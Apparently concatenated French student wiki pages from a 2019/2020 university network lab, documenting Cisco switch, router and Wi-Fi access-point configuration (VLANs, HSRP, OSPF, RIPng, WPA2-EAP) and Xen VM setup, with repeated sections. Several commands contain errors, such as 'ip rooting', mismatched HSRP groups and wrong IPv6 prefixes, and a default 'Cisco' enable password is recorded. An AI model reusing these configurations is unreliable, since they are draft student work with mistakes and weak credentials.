encapsulation dot1q 7
rewrite ingress tag pop 1 symmetric
bridge-domain 7

Voici le vlan associé à l'interconnexion :

service instance 42 ethernet
encapsulation dot1q 42
rewrite ingress tag pop 1 symmetric
bridge-domain 42

====== Vers le SR 32 ======
interface XXXX
no ip address
negotiation auto
service instance 130 ethernet
encapsulation dot1q 130
bridge-domain 130

===== Configuration des BDI =====

conf t
interface BDI2
ip address 10.60.1.254 255.255.255.000 //Attribut l'addresse IPV4 pour le routeur ainsi que son mask
standby version 2 //Activation du HSRP (Host service Routing protocole) version 2 plus stable que la 1
standby 3 ip 10.60.1.252 //Donne l'addresse IPV4 du routeur virtuelle pour le HSRP
standby 3 preempt // Activation du HSRP
ipv6 address 2001:660:4401:60B3::/64 eui-64 //Attribut l'addresse IPV6
ipv6 enable //Active l'addressage IPV6
ipv6 nd prefix 2001:660:4401:60B3::/64 1000 900 //Donner un préfixe IPV6 à chaque machine
ipv6 nd router-preference high //IPV6 sera la route de préférence par défaut avec une forte probabilitée
exit

interface BDI3
ip address 10.60.2.254 255.255.255.000
standby version 2
standby 3 ip 10.60.2.252
standby 3 preempt
ipv6 address 2001:660:4401:60B3::/64 eui-64
ipv6 enable
ipv6 nd prefix 2001:660:4401:60B3::/64 1000 900
ipv6 nd router-preference High
exit

interface BDI4
ip address 10.60.3.254 255.255.255.000
standby version 2
standby 4 ip 10.60.3.252
standby 4 preempt
ipv6 address 2001:660:4401:60B4::/64 eui-64
ipv6 enable
ipv6 nd prefix 2001:660:4401:60B4::/64 1000 900
ipv6 nd router-preference High
exit

interface BDI5
ip address 10.60.4.254 255.255.255.000
standby version 2
standby 5 ip 10.60.4.252
standby 5 preempt
ipv6 address 2001:660:4401:60B5::/64 eui-64
ipv6 enable
ipv6 nd prefix 2001:660:4401:60B5::/64 1000 900
ipv6 nd router-preference High
exit

interface BDI6
ip address 10.60.5.254 255.255.255.000
standby version 2
standby 6 ip 10.60.5.252
standby 6 preempt
ipv6 address 2001:660:4401:60B6::/64 eui-64
ipv6 enable
ipv6 nd prefix 2001:660:4401:60B6::/64 1000 900
ipv6 nd router-preference High
exit

interface BDI7
ip address 10.60.6.254 255.255.255.000
standby version 2
standby 6 ip 10.60.6.252
standby 6 preempt
ipv6 address 2001:660:4401:60B7::/64 eui-64
ipv6 enable
ipv6 nd prefix 2001:660:4401:60B7::/64 1000 900
ipv6 nd router-preference High
exit

interface BDI42
ip address 193.48.57.173 255.255.255.240
standby version 2
standby 7 ip 193.48.57.172
standby 7 preempt
ipv6 address 2001:660:4401:60B1::/64 eui-64
ipv6 enable
ipv6 nd prefix 2001:660:4401:60B1::/64 1000 900
ipv6 nd router-preference High
exit

int vlan 130
ip address 192.168.222.1 255.255.255.248
ipv6 address fe80::2 link-local
ipv6 enable
ipv6 rip tpima2a5 enable
exit
ip rooting

exit
write

==== Interconnexion du réseau IPV4 ====

Se le faire expliquer parce que rien compris

configure terminal
ip routing
router ospf 1 //création d'un opsf (Open Shortest Path First)
router-id 10.60.1.254
log-adjacency-changes
summary-address 193.48.57.160 255.255.255.240 //donne l'addresse IP la plus base du réseau routé
summary-address 10.60.0.1 255.255.0.0 not-advertise //donne l'addresse Ip la plus base du réseau non routé/ privé
redistribute connected subnets
network 192.168.222.8 0.0.0.7 area 1
exit
exit
write

==== Interconnexion du réseau IPV6 ====

conf t
ipv6 router rip tpima2a5 //Création d'une route IPV6 sous le nom tpima2a5
redistribute connected metric 1
redistribute rip 1 metric 1
redistribute static metric 1
exit
exit
write

==== Sécurisation du réseau ====

Question pour Redon addresse Ip à définir

conf t
int XXXX
ip address 10.10.10.2 255.255.255.0
vrrp 1 ip 10.10.10.3
vrrp 1 preempt //Activation de la préemption, si jamais le routeur tombe en panne, l'autre prend sa place
vrrp 1 priority 100 //Dans le vvrp n°1 on définit la priorité à 100, plus la priorité est élevé plus il sera sollicité
exit
exit
write

=== Configuration du router E306 ===

===== Connexion =====

Pour accéder au routeur, nous avons utilisé minicom avec un USB directement branché sur la prise console du commutateur :

minicom -os ( avec '''ttyUSB0''', une vitesse de transfert de '''9600 bauds''' et le ''''flow control désactivé''') // les paramètres sont modifiable directement depuis les options de minicom

===== Commande de base =====

Ce sont exactement les mêmes que celles utilisées pour les commutateurs

==== Configuration des ports ====

====== Vers les commutateurs ======

La configuration est la même pour les 2 ports correspondant aux commutateurs
Nous avons besoin de 6 Vlan pour nos groupes et d'un Vlan d'interconnexio

conf t
interface Vlan2
ip address 10.60.1.253 255.255.255.0
ipv6 address 2001:660:4401:60B2::/64 eui-64
ipv6 enable
ipv6 nd prefix 2001:660:4401:60B2::/64 1000 900
ipv6 nd router-preference High
standby version 2
standby 2 ip 10.60.1.252
standby 2 preempt
exit

interface Vlan3
ip address 10.60.2.253 255.255.255.0
ipv6 address 2001:660:4401:60B3::/64 eui-64
ipv6 enable
ipv6 nd prefix 2001:660:4401:60B3::/64 1000 900
ipv6 nd router-preference High
standby version 2
standby 3 ip 10.60.2.252
standby 3 preempt
exit

interface Vlan4
ip address 10.60.3.253 255.255.255.0
ipv6 address 2001:660:4401:60B4::/64 eui-64
ipv6 enable
ipv6 nd prefix 2001:660:4401:60B4::/64 1000 900
ipv6 nd router-preference High
standby version 2
standby 4 ip 10.60.3.252
standby 4 preempt
exit

interface Vlan5
ip address 10.60.4.253 255.255.255.0
ipv6 address 2001:660:4401:60B5::/64 eui-64
ipv6 enable
ipv6 nd prefix 2001:660:4401:60B5::/64 1000 900
ipv6 nd router-preference High
standby version 2
standby 5 ip 10.60.4.252
standby 5 preempt
exit

interface Vlan6
ip address 10.60.5.253 255.255.255.0
ipv6 address 2001:660:4401:60B6::/64 eui-64
ipv6 enable
ipv6 nd prefix 2001:660:4401:60B6::/64 1000 900
ipv6 nd router-preference High
standby version 2
standby 6 ip 10.60.5.252
standby 6 preempt
exit

interface Vlan7
ip address 10.60.6.253 255.255.255.0
ipv6 address 2201:660:4401:60B7::/64 eui-64
ipv6 enable
ipv6 nd prefix 2201:660:4401:60B7::/64 1000 900
ipv6 nd router-preference High
standby version 2
standby 7 ip 10.60.6.252
standby 7 preempt
exit

interface Vlan42
ip address 193.48.57.174 255.255.255.0
ipv6 address 2001:660:4401:60B1::/64 eui-64
ipv6 enable
ipv6 nd prefix 2001:660:4401:60B1::/64 1000 900
ipv6 nd router-preference High
standby version 2
standby 42 ip 193.48.57.172
standby 42 preempt
exit

interface Vlan130
ip address 192.168.222.2 255.255.255.248
ipv6 address FE80::42:2 link-local
ipv6 enable
exit

exit
write

==== Interconnexion du réseau IPV4 ====

configure terminal
router ospf 1 //création d'un opsf (Open Shortest Path First)
router-id 10.60.1.253
log-adjacency-changes
summary-address 193.48.57.160 255.255.255.240 //donne l'addresse IP la plus base du réseau routé
summary-address 10.60.0.1 255.255.0.0 not-advertise //donne l'addresse Ip la plus base du réseau non routé/ privé
redistribute connected subnets
network 192.168.222.8 0.0.0.7 area 1
exit
exit
write

==== Interconnexion du réseau IPV6 ====

conf t
ipv6 router rip tpima2a5 //Création d'une route IPV6 sous le nom tpima2a5
redistribute connected metric 1
redistribute rip 1 metric 1
redistribute static metric 1
exit
exit
write

TP système & reseau IMA2a5 2019/2020

2019-11-28T16:59:46Z

Jcabrald : /* Bornes Wi-Fi */

== Introduction ==

Bienvenue sur l'article wikipédia de la promotion 2017 - 2020 de la section IMA2A5. Cette page traite du sujet de protocole avancé vu en semestre 9.
Le lien vers le sujet est : [https://rex.plil.fr/Enseignement/Reseau/Protocoles.IMA5sc/reseau.html https://rex.plil.fr/Enseignement/Reseau/Protocoles.IMA5sc/reseau.html]

== Répartition des binômes ==

{| class="wikitable"
! Page du groupe !! Prénom & NOM !! Nom de domaine acheté !! Certificat associé ?
|-
| [[ TP sysres IMA2a5 2019/2020 G1 | Cahier groupe n°1]]
| Fabien CAVALIER & Maxime HIRT
|[https://ima2a5-zerofun.site https://ima2a5-zerofun.site ]
|
|-
| [[ TP sysres IMA2a5 2019/2020 G2 | Cahier groupe n°2]]
| Ekaterina ISHCHUK & Loick MOLLET
| [https://ima2a5-mol-ish.site https://ima2a5-mol-ish.site]
|
|-
| [[ TP sysres IMA2a5 2019/2020 G3 | Cahier groupe n°3]]
| Quentin WEISBECKER & Pascal COINT
|[https://ima2a5-rex4ever.site https://ima2a5-rex4ever.site]
|[https://wiki-ima.plil.fr/mediawiki//index.php/TP_sysres_IMA2a5_2019/2020_G3#Affectation_du_certificat_sur_Gandi.net voir ici]
|-
| [[ TP sysres IMA2a5 2019/2020 G4 | Cahier groupe n°4]]
| Malick SECK & Gael WATBLED
|[https://ima2a5-wateck.site https://ima2a5-wateck.site]
|
|-
| [[ TP sysres IMA2a5 2019/2020 G5 | Cahier groupe n°5]]
| Quentin VERNE & Adrien MONFILLIETTE
|[https://ima2a5-nofun.site https://ima2a5-nofun.site]
|
|-
| [[ TP sysres IMA2a5 2019/2020 G6 | Cahier groupe n°6]]
| Hamza FAHIM & Jorge CABRAL-DAS-DORES
| [https://ima2a5-4fun.site https://ima2a5-4fun.site]
|
|-
|}

== Table IP VLANs ==

{| class="wikitable" style="text-align:center"
! Nom !! Vlan !! Réseau IPV4 (Routé) !! Réseau IPV6 !! IP Routeur 1 !! IP Routeur 2 !! IP Routeur Virtuel !! IPv4 VLAN Wi-Fi (non routé)
|-
|Xen
|42
|193.48.57.160/28
|2001:660:4401:60B1::/64
|193.48.57.174
|193.48.57.173
|193.48.57.172
| ****
|-
|Groupe 1
|2
| ****
|2001:660:4401:60B2::/64
|10.60.1.254
|10.60.1.253
|10.60.1.252
|10.60.1.0/16
|-
|Groupe 2
|3
| ****
|2001:660:4401:60B3::/64
|10.60.2.254
|10.60.2.253
|10.60.2.252
|10.60.2.0/16
|-
|Groupe 3
|4
| ****
|2001:660:4401:60B4::/64
|10.60.3.254
|10.60.3.253
|10.60.3.252
|10.60.3.0/16
|-
|Groupe 4
|5
| ****
|2001:660:4401:60B5::/64
|10.60.4.254
|10.60.4.253
|10.60.4.252
|10.60.4.0/16
|-
|Groupe 5
|6
| ****
|2001:660:4401:60B6::/64
|10.60.5.254
|10.60.5.253
|10.60.5.252
|10.60.5.0/16
|-
|Groupe 6
|7
| ****
|2001:660:4401:60B7::/64
|10.60.6.254
|10.60.6.253
|10.60.6.252
|10.60.6.0/16
|-
|}

== Architecture matérielle ==

[[Fichier:Archi_IMA2A5.jpg|500px|center|thumb|© Copyright Minou]]

== Machines virtuelles ==

{| class="wikitable"
!Groupe !! Nom de la VM !! IP de la VM
|-
|Groupe 1
|ima2a5-zerofun
|193.48.57.161/28
|-
|Groupe 2
|ima2a5-mol-ish
|193.48.57.162/28
|-
|Groupe 3
|ima2a5-rex4ever
|193.48.57.163/28
|-
|Groupe 4
|ima2a5-wateck
|193.48.57.164/28
|-
|Groupe 5
|ima2a5-nofun
|193.48.57.165/28
|-
|Groupe 6
|ima2a5-4fun
|193.48.57.166/28
|-
|}

== Bornes Wi-Fi ==

{| class="wikitable"
!Groupe !! Nom de la VM !! Nom SSID !! Numéro Vlan Wifi ( SSID )
|-
|Groupe 1
|ima2a5-zerofun
|SSID_ima2a5-zerofun
|2
|-
|Groupe 2
|ima2a5-mol-ish
|SSID_ima2a5-mol-ish
|3
|-
|Groupe 3
|ima2a5-rex4ever
|SSID_ima2a5-rex4ever
|4
|-
|Groupe 4
|ima2a5-wateck
|SSID_ima2a5-wateck
|5
|-
|Groupe 5
|ima2a5-nofun
|SSID_ima2a5-nofun
|6
|-
|Groupe 6
|ima2a5-4fun
|SSID_ima2a5-4fun
|7
|-
|}

== Architecture Réseau ==

Dans cette partie, vous trouverez comment nous avons configuré les routeurs ainsi que les commutateurs qui se trouve dans les salles E304 et E306.

=== Configuration des 2 commutateurs ===

===== Connexion =====

Pour accéder au commutateur, nous avons utilisé minicom avec un cable série directement branché sur la prise console du commutateur :

minicom -os ( avec '''ttyUSB0''', une vitesse de transfert de '''9600 bauds''' et le '''flow control désactivé''') // les paramètres sont modifiable directement depuis les options de minicom

===== Commande de base =====

Voici quelque commandes de base qui nous ont servi pour la configuration des commutateurs

enable // passage en admin pour pouvoir accéder aux données du commutateur

write // Sauvegarde de la configuration et l’implanter dans le commutateur

show interface status OU sh int status // Montre l'état de toutes les interfaces présentes sur le commutateur ainsi que les données associées

configuration terminal // permets d'accéder aux interfaces et ainsi pouvoir les modifier

exit // permets de sortir du configurateur actuel (par exemple sortir de l'interface)

==== Configuration des ports du commutateur ====

Nous avons 4 connexions qui sont dirigées vers le commutateur de la salle E304 ainsi que celui en E306
- Un lien vers le routeur
- Un lien vers la borne wifi
- Un lien vers Corduan
- Un lien vers l'autre commutateur

{| class="wikitable" style="text-align: center;width: 85%;margin: auto;"
! Connexion !! E304 !! E306
|-
! scope="row" style="width: 20%"|Corduan
|style="width: 40%"| A remplir !
|style="width: 40%"| A remplir !
|-
! scope="row" style="width: 20%"|Borne Wifi
|style="width: 40%"| A remplir !
|style="width: 40%"| A remplir !
|-
! scope="row" style="width: 20%"|Commutateur
|style="width: 40%"| A remplir !
|style="width: 40%"| A remplir !
|-
! scope="row" style="width: 20%"|Router
|style="width: 40%"| A remplir !
|style="width: 40%"| A remplir !
|-
|}
}

===== Création du lien pour la borne wifi =====

enable
configure terminal (ou conf t)
interface XXXX (ou int XXXX)
switchport //Rendre accessible la modification du port
switchport trunk encapsulation dot1q //Encapsule avec la trame le numéro du Vlan associé, ce qui permettra de d'avoir de quel équipement viens le paquet ainsi la réponse sera dirigé vers le bon port
switchport mode trunk //Configure le port du switch en mode trunk, ce qui permets de ne pas avoir de restriction sur les Vlan, tous les Vlan peuvent passer à travers ce port
no shut //Démarre le port ou de le garder actif
exit
exit
write

===== Création du lien pour Corduan =====

enable
configure terminal
interface XXXX
switchport
switchport mode access //Rendre modifiable le port
switchport access vlan42 //Autoriser le vlan 42 à transister à travers ce port
no shutdown
exit
exit
write

===== Création du lien pour le router =====

enable
configure terminal (ou conf t)
interface XXXX (ou int XXXX)
switchport
switchport trunk encapsulation dot1q
switchport mode trunk
no shut
exit
exit
write

===== Création du lien pour l'autre commutateur =====

enable
configure terminal (ou conf t)
interface XXXX (ou int XXXX)
switchport
switchport trunk encapsulation dot1q
switchport mode trunk
no shut
exit
exit
write

===== Création des Vlan =====

enable
conf t
vlan 42
name Corduan
exit
exit
write

enable
conf t
vlan 2 à 7
name groupe 1 à 6
exit
exit
write

enable
conf t
vlan 130
name interconnexion
exit
exit
write

Pour supprimer un vlan il suffit de faire :
no vlan X

=== Configuration du router E304 ===

===== Connexion =====

Pour accéder au routeur, nous avons utilisé minicom avec un USB directement branché sur la prise console du commutateur :

minicom -os ( avec '''ttyACM0''', une vitesse de transfert de '''9600 bauds''' et le ''''flow control désactivé''') // les paramètres sont modifiable directement depuis les options de minicom

===== Commande de base =====

Ce sont exactement les mêmes que celles utilisées pour les commutateurs

==== Configuration des ports ====

====== Vers les commutateurs ======

La configuration est la même pour les 2 ports correspondant aux commutateurs
Nous avons besoin de 6 Vlan pour nos groupes et d'un Vlan d'interconnexion

enable

configure terminal

interface XXXX
no ip address //Pas d'addresse IP associé
negotiation auto //Détermine automatiquement la vitesse de transfert
media-type RJ45 //Type de connexion (ici RJ45)

Voici les vlan associé à nos groupes :

service instance 2 ethernet // création d'un vlan 2 dans cette interface
encapsulation dot1q 2 // Permets d'assurer une continuité d'un VLAN issue d'un switch sur un routeur via un lien trunk
rewrite ingress tag pop 1 symmetric // retire le tag du vlan
bridge-domain 2 //création d'un bridge domaine interface (BDI) attribué au chiffre 2

service instance 3 ethernet
encapsulation dot1q 3
rewrite ingress tag pop 1 symmetric
bridge-domain 3

service instance 4 ethernet
encapsulation dot1q 4
rewrite ingress tag pop 1 symmetric
bridge-domain 4

service instance 5 ethernet
encapsulation dot1q 5
rewrite ingress tag pop 1 symmetric
bridge-domain 5

service instance 6 ethernet
encapsulation dot1q 6
rewrite ingress tag pop 1 symmetric
bridge-domain 6

service instance 7 ethernet
encapsulation dot1q 7
rewrite ingress tag pop 1 symmetric
bridge-domain 7

Voici le vlan associé à l'interconnexion :

service instance 42 ethernet
encapsulation dot1q 42
rewrite ingress tag pop 1 symmetric
bridge-domain 42

====== Vers le SR 32 ======
interface XXXX
no ip address
negotiation auto
service instance 130 ethernet
encapsulation dot1q 130
bridge-domain 130

===== Configuration des BDI =====

conf t
interface BDI2
ip address 10.60.1.254 255.255.255.000 //Attribut l'addresse IPV4 pour le routeur ainsi que son mask
standby version 2 //Activation du HSRP (Host service Routing protocole) version 2 plus stable que la 1
standby 3 ip 10.60.1.252 //Donne l'addresse IPV4 du routeur virtuelle pour le HSRP
standby 3 preempt // Activation du HSRP
ipv6 address 2001:660:4401:60B3::/64 eui-64 //Attribut l'addresse IPV6
ipv6 enable //Active l'addressage IPV6
ipv6 nd prefix 2001:660:4401:60B3::/64 1000 900 //Donner un préfixe IPV6 à chaque machine
ipv6 nd router-preference high //IPV6 sera la route de préférence par défaut avec une forte probabilitée
exit

interface BDI3
ip address 10.60.2.254 255.255.255.000
standby version 2
standby 3 ip 10.60.2.252
standby 3 preempt
ipv6 address 2001:660:4401:60B3::/64 eui-64
ipv6 enable
ipv6 nd prefix 2001:660:4401:60B3::/64 1000 900
ipv6 nd router-preference High
exit

interface BDI4
ip address 10.60.3.254 255.255.255.000
standby version 2
standby 4 ip 10.60.3.252
standby 4 preempt
ipv6 address 2001:660:4401:60B4::/64 eui-64
ipv6 enable
ipv6 nd prefix 2001:660:4401:60B4::/64 1000 900
ipv6 nd router-preference High
exit

interface BDI5
ip address 10.60.4.254 255.255.255.000
standby version 2
standby 5 ip 10.60.4.252
standby 5 preempt
ipv6 address 2001:660:4401:60B5::/64 eui-64
ipv6 enable
ipv6 nd prefix 2001:660:4401:60B5::/64 1000 900
ipv6 nd router-preference High
exit

interface BDI6
ip address 10.60.5.254 255.255.255.000
standby version 2
standby 6 ip 10.60.5.252
standby 6 preempt
ipv6 address 2001:660:4401:60B6::/64 eui-64
ipv6 enable
ipv6 nd prefix 2001:660:4401:60B6::/64 1000 900
ipv6 nd router-preference High
exit

interface BDI7
ip address 10.60.6.254 255.255.255.000
standby version 2
standby 6 ip 10.60.6.252
standby 6 preempt
ipv6 address 2001:660:4401:60B7::/64 eui-64
ipv6 enable
ipv6 nd prefix 2001:660:4401:60B7::/64 1000 900
ipv6 nd router-preference High
exit

interface BDI42
ip address 193.48.57.173 255.255.255.240
standby version 2
standby 7 ip 193.48.57.172
standby 7 preempt
ipv6 address 2001:660:4401:60B1::/64 eui-64
ipv6 enable
ipv6 nd prefix 2001:660:4401:60B1::/64 1000 900
ipv6 nd router-preference High
exit

int vlan 130
ip address 192.168.222.1 255.255.255.248
ipv6 address fe80::2 link-local
ipv6 enable
ipv6 rip tpima2a5 enable
exit
ip rooting

exit
write

==== Interconnexion du réseau IPV4 ====

Se le faire expliquer parce que rien compris

configure terminal
ip routing
router ospf 1 //création d'un opsf (Open Shortest Path First)
router-id 10.60.1.254
log-adjacency-changes
summary-address 193.48.57.160 255.255.255.240 //donne l'addresse IP la plus base du réseau routé
summary-address 10.60.0.1 255.255.0.0 not-advertise //donne l'addresse Ip la plus base du réseau non routé/ privé
redistribute connected subnets
network 192.168.222.8 0.0.0.7 area 1
exit
exit
write

==== Interconnexion du réseau IPV6 ====

conf t
ipv6 router rip tpima2a5 //Création d'une route IPV6 sous le nom tpima2a5
redistribute connected metric 1
redistribute rip 1 metric 1
redistribute static metric 1
exit
exit
write

==== Sécurisation du réseau ====

Question pour Redon addresse Ip à définir

conf t
int XXXX
ip address 10.10.10.2 255.255.255.0
vrrp 1 ip 10.10.10.3
vrrp 1 preempt //Activation de la préemption, si jamais le routeur tombe en panne, l'autre prend sa place
vrrp 1 priority 100 //Dans le vvrp n°1 on définit la priorité à 100, plus la priorité est élevé plus il sera sollicité
exit
exit
write

=== Configuration du router E306 ===

===== Connexion =====

Pour accéder au routeur, nous avons utilisé minicom avec un USB directement branché sur la prise console du commutateur :

minicom -os ( avec '''ttyUSB0''', une vitesse de transfert de '''9600 bauds''' et le ''''flow control désactivé''') // les paramètres sont modifiable directement depuis les options de minicom

===== Commande de base =====

Ce sont exactement les mêmes que celles utilisées pour les commutateurs

==== Configuration des ports ====

====== Vers les commutateurs ======

La configuration est la même pour les 2 ports correspondant aux commutateurs
Nous avons besoin de 6 Vlan pour nos groupes et d'un Vlan d'interconnexio

conf t
interface Vlan2
ip address 10.60.1.253 255.255.255.0
ipv6 address 2001:660:4401:60B2::/64 eui-64
ipv6 enable
ipv6 nd prefix 2001:660:4401:60B2::/64 1000 900
ipv6 nd router-preference High
standby version 2
standby 2 ip 10.60.1.252
standby 2 preempt
exit

interface Vlan3
ip address 10.60.2.253 255.255.255.0
ipv6 address 2001:660:4401:60B3::/64 eui-64
ipv6 enable
ipv6 nd prefix 2001:660:4401:60B3::/64 1000 900
ipv6 nd router-preference High
standby version 2
standby 3 ip 10.60.2.252
standby 3 preempt
exit

interface Vlan4
ip address 10.60.3.253 255.255.255.0
ipv6 address 2001:660:4401:60B4::/64 eui-64
ipv6 enable
ipv6 nd prefix 2001:660:4401:60B4::/64 1000 900
ipv6 nd router-preference High
standby version 2
standby 4 ip 10.60.3.252
standby 4 preempt
exit

interface Vlan5
ip address 10.60.4.253 255.255.255.0
ipv6 address 2001:660:4401:60B5::/64 eui-64
ipv6 enable
ipv6 nd prefix 2001:660:4401:60B5::/64 1000 900
ipv6 nd router-preference High
standby version 2
standby 5 ip 10.60.4.252
standby 5 preempt
exit

interface Vlan6
ip address 10.60.5.253 255.255.255.0
ipv6 address 2001:660:4401:60B6::/64 eui-64
ipv6 enable
ipv6 nd prefix 2001:660:4401:60B6::/64 1000 900
ipv6 nd router-preference High
standby version 2
standby 6 ip 10.60.5.252
standby 6 preempt
exit

interface Vlan7
ip address 10.60.6.253 255.255.255.0
ipv6 address 2201:660:4401:60B7::/64 eui-64
ipv6 enable
ipv6 nd prefix 2201:660:4401:60B7::/64 1000 900
ipv6 nd router-preference High
standby version 2
standby 7 ip 10.60.6.252
standby 7 preempt
exit

interface Vlan42
ip address 193.48.57.174 255.255.255.0
ipv6 address 2001:660:4401:60B1::/64 eui-64
ipv6 enable
ipv6 nd prefix 2001:660:4401:60B1::/64 1000 900
ipv6 nd router-preference High
standby version 2
standby 42 ip 193.48.57.172
standby 42 preempt
exit

interface Vlan130
ip address 192.168.222.2 255.255.255.248
ipv6 address FE80::42:2 link-local
ipv6 enable
exit

exit
write

==== Interconnexion du réseau IPV4 ====

configure terminal
router ospf 1 //création d'un opsf (Open Shortest Path First)
router-id 10.60.1.253
log-adjacency-changes
summary-address 193.48.57.160 255.255.255.240 //donne l'addresse IP la plus base du réseau routé
summary-address 10.60.0.1 255.255.0.0 not-advertise //donne l'addresse Ip la plus base du réseau non routé/ privé
redistribute connected subnets
network 192.168.222.8 0.0.0.7 area 1
exit
exit
write

==== Interconnexion du réseau IPV6 ====

conf t
ipv6 router rip tpima2a5 //Création d'une route IPV6 sous le nom tpima2a5
redistribute connected metric 1
redistribute rip 1 metric 1
redistribute static metric 1
exit
exit
write

TP sysres IMA2a5 2019/2020 G6

2019-11-28T16:56:58Z

Jcabrald : /* Configuration des points d'accès Wi-Fi */

Jorge Cabral & Hamza Fahim

== Introduction ==
Le projet a pour but de mettre en place un réseau sur 2 salles du bâtiment E de polytech constitué de 2 routeurs, 2 commutateurs, 2 bornes Wifi et un serveur.
Chaque groupe dispose de machines virtuelles sur le serveur, qui permettront de constituer chacun un domaine acheté sur GANDI.
Les routeurs et commutateurs seront configurés à l'aide de netbooks configurés par nos soins.

== Installation du réseau : connexion des routeurs, commutateurs, bornes WiFi et du serveur Cordouan ==
[[Fichier:archi_reseau_2.png]]

== Mise en place du serveur ==

=== Préparation et configuration des machines virtuelles ===

==== Création de la machine virtuelle ====
La machine virtuelle est crée sur le serveur Cordouan :
ssh root@cordouan.insecserv.deule.net

Création de la machine virtuelle :
xen-create-image --hostname=ima2a5-4fun --dhcp --dir=/usr/local/xen --dist=ascii --apt_proxy=http://proxy.polytech-lille.fr:3128 --force

==== Démarrage/Arrêt/Redémarrage de la machine virtuelle ====
Avant de démarrer la VM, nous devons modifierle fichier /etc/xen/ima2a5-4fun.cfg afin de rajouter le bridge.
Il faut d'abord récuperer le nom du bridge avec la commande:
brctl show
Le du bridge est :IMA2a5
Ensuite nous remplaçons dans le fichier "ima2a5-4fun.cfg" la ligne contenant "vif = [ 'mac=00:16:3E:A8:74:CA']" par :
vif = [ 'mac=00:16:3E:A8:74:CA, bridge=IMA2a5']

Puis,nous pouvons démarrager la machine virtuelle :
xl create /etc/xen/ima2a5-4fun.cfg

et acceder à la VM :
xl console ima2a5-4fun
L'utilisateur étant:
user : root
password: c'est le contenu de ligne commençant par "Root Password" du fichier "/var/log/xen-tools/ima2a5-4fun.log"

Pour changer le password root, utiliser:
passwd

On peut revenir à la machine hôte sans arrêter la MV avec la combinaison
Ctrl + AltGr + ]

Arrêt de la machine virtuelle depuis l'hôte :
xl destroy ima2a5-4fun

==== Adaptation de la machine virtuelle à l'architecture réseau du projet ====
Coordonnées IP statiques de la machine virtuelle sur le fichier /etc/network/interfaces
iface eth0 inet static
address 193.48.57.166
netmask 255.255.255.240
gateway 193.48.57.172

==== Personnalisation des points de montage /var et /home ====

Création de 2 volumes de 10GB sur la machine hôte :
lvcreate -L10G -n ima2a5-4fun-home virtual
lvcreate -L10G -n ima2a5-4fun-var virtual

Formatage des volumes :
mkfs.ext4 /dev/virtual/ima2a5-4fun-home
mkfs.ext4 /dev/virtual/ima2a5-4fun-var

Inclusion des volumes dans la machine virtuelle en modifiant /etc/xen/ima2a5-4fun.cfg :

root = '/dev/xvda2 ro'
disk = [
'file:/usr/local/xen/domains/ima2a5-4fun/disk.img,xvda2,w',
'file:/usr/local/xen/domains/ima2a5-4fun/swap.img,xvda1,w',
'phy:/dev/virtual/ima2a5-4fun-home,xvdb1,w',
'phy:/dev/virtual/ima2a5-4fun-var,xvdb2,w'
]

Afin de vérifier si tout est correct on arrête complétement la VM (et non pas rebboter) et on recréé la VM

puis, vérifier sur la machine hôte et la VM si les deux partitions on bien été créées avec la commande:
fdisk -l

Puis, on modifie le fichier /etc/fstable de la VM pour que l'OS les monte automatiquement au démarrage:
# <file system> <mount point> <type> <options> <dump> <pass>
proc /proc proc defaults 0 0
devpts /dev/pts devpts rw,noexec,nosuid,gid=5,mode=620 0 0
/dev/xvda1 none swap sw 0 0
/dev/xvda2 / xt4 noatime,nodiratime,errors=remount-ro 0 1
/dev/xvdb1 /home ext4 defaults 0 2
/dev/xvdb2 /var ext4 defaults 0 2

==== Installation des serveurs SSH, DNS et https ====

Installation du serveur apache :
apt install apache2

Installation du serveur ssh :
apt install openssh-server

Création du service sshd lancé au démarrage par runit :
mkdir /etc/service
mkdir /etc/service/sshd
touch /etc/service/sshd/run
configuration du fichier etc/service/sshd/run:
#!/bin/sh
ssh-ketgen -A >/dev/null 2>&1
[ -r conf ] && . ./conf
exec /usr/sbin/sshd -D $OPTS

Autorise l'exécution du fichier run
chmod +x /etc/service/sshd/run

== Sécurisation Wifi par WPA2-EAP ==
=== Configuration des points d'accès Wi-Fi===

Dans cette partie, on dispose de deux bornes wifi a configurer, la premiére en E306 et l'autre en E304, en utilisera le server FreeRadius pour l'identification.
Tout d'abord effectuons un purge:
apt purge brltty

Puis:

1- Acceder à la configuration de la borne wifi :

minicom -os

On change la configuration pour: Port = /dev/ttyUSB0, 9600 bauds et sans control de flux

2- Se mettre en mode previligié :

enable
Password = "Cisco"

3- Se mettre en mode configuration :

config term

(On peut aussi verifier la configuration de la borne avec "show run")

NB : Les commandes 5 à 10, sont à faire pour chaque groupe de la promo.

4- Pour utiliser le system en 'authentication, authorization, and accounting', il faut cette commande :

aaa new-model

5- On crée un server radius pour un groupe :

radius-server host < ip_groupe6 > auth-port 1812 acct-port 1813 // on remplace ip_groupe6 par l'IP de notre groupe (de la VM) , et comme port d'authentification 1812,et accounting 1813

6- On defini le server group :

aaa group server radius radius_groupe6 // on remplace groupe6 par le nom de notre groupe "IMA2a5-4fun"

7- Puis, on associe à ce groupe de serveur le serveur créé sur la VM:

server <ip_VM_groupe6> auth-port 1812 acct-port 1813

8- Ensuite, on defini le login et le groupe server par lequel l'utilisateur passera pour s'authentifier :

aaa authentication login eap_groupe6 group radius_groupe6 // remplacer groupe6 par le nom de notre groupe

9- On arrive à la création des SSID, protégé par la méthode WPA2-EAP :

dot11 ssid SSID_groupe6 // pour notre groupe groupe6="IMA2a5_4fun". [https://wiki-ima.plil.fr/mediawiki//index.php/TP_syst%C3%A8me_%26_reseau_IMA2a5_2019/2020#Bornes_Wi-Fi tableau Borne Wifi]
authentication open eap eap_groupe6
authentication network-eap eap_groupe6
authentication key-management wpa

10- Configurer les vlans des groupes :

interface Dot11Radio0 // on rentre d'abord dans l'interface Dot11Radio0
encryption vlan x mode ciphers aes-ccm tkip // Où x est le numéro du vlan . Pour notre groupe x=7

Pour pouvoir se connecter au réseau, il faudra relier l'interfaces virtuelle à l'interface gigabites, via des 'bridge-groupe', et comme il y a plusieurs grouoes, il faut créer autant des sous-interfaces dot11radio0 et puis la relier
aux sous-interfaces gigabites.

11- Créer une sous-interface pour chaque groupe, en donnant à l'instance le numéro du vlan :

interface dot11Radio0.num_vlan // num_vlan a remplacer par le numéro du vlan
encapsulation dot1Q num_vlan
bridge-group num_vlan

12- Créer une sous-interface gigabite pour chaque groupe, en donnant à l'instance le numéro du vlan :

interface gigabite0.num_vlan // num_vlan a remplacer par le numéro du vlan
encapsulation dot1Q num_vlan
bridge-group num_vlan

13- Ajouter les SSID à l'interface Dot11Radio0

